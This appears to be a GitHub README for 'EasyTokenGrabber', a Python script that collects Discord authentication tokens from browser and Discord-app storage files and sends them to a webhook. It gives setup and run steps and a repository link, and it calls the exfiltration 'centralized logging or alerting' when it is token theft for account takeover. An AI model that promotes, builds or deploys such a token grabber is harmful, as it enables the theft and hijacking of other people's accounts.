This Python script extracts Discord tokens from local storage files across various browsers and the Discord desktop application. It searches for tokens stored in .ldb
and .log
files and sends any found tokens to a specified Discord webhook for centralized logging or alerting.
- Google Chrome
- Mozilla Firefox
- Discord Desktop App
- Opera GX
- Multi-Browser Support: Extracts tokens from multiple browsers and the Discord desktop application.
- File Handling: Searches through
.ldb
and.log
files. - Webhook Integration: Sends extracted tokens to a Discord webhook.
- Error Handling: Reports any issues encountered during token extraction or webhook interaction.
-
Update Webhook URL: Replace the placeholder URL in the script with your actual Discord webhook URL.
webhook_url = 'https://discord.com/api/webhooks/your_webhook_id/your_webhook_token'
-
Run the Script: Execute the script using Python.
python main.py
-
Clone the Repository:
git clone https://github.com/zentonik/EasyTokenGrabber.git cd EasyTokenGrabber
-
Install Dependencies:
Ensure Python is installed, then install the required dependencies:
pip install requests